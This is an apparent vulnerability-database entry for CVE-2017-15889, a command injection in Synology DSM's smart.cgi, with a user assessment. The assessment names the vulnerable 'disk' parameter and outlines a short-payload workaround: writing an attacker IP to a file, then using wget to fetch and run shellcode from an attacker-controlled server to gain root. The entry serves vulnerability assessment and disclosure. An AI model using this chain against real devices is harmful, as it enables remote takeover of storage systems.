CVE-2017-15889

2017-12-0400:00:00

attackerkb.com

0.119 Low

EPSS

Percentile

95.4%

JSON

Command injection vulnerability in smart.cgi in Synology DiskStation Manager (DSM) before 5.2-5967-5 allows remote authenticated users to execute arbitrary commands via disk field.

Recent assessments:

h00die at May 20, 2020 12:19pm UTC reported:

AUTHENTICATED command execution in webman/modules/StorageManager/smart.cgi through either a GET or POST request.
Variables for the request look as such:

        'action' =&gt; 'apply',
        'operation' =&gt; 'quick',
        'disk' =&gt; "/dev/sda"

The disk field is vulnerable. However, that’s just where this fun begins. The disk field is required to be ‘semi’ disk correct. AKA you can’t just have nothing there, or a, however /dev/sd did seem to work. Next, when the command is passed off, the entire disk field is limited to 30 characters. After shortening to /dev/sd and then adding ticks (‘`’) you are left with 22 characters. Pretty tight spacing.

To circumvent this restriction, the following was done:

in < 22 characters, echo -n and ip:port to a file (/a).
use wget -i /a -O <file> to then pull back shell code from a attacker controlled HTTP server
execute the payload

Most likely step 1 will need to be done in > 1 steps.

Exploitation grants root privileges.

Assessed Attacker Value: 5
Assessed Attacker Value: 5Assessed Attacker Value: 2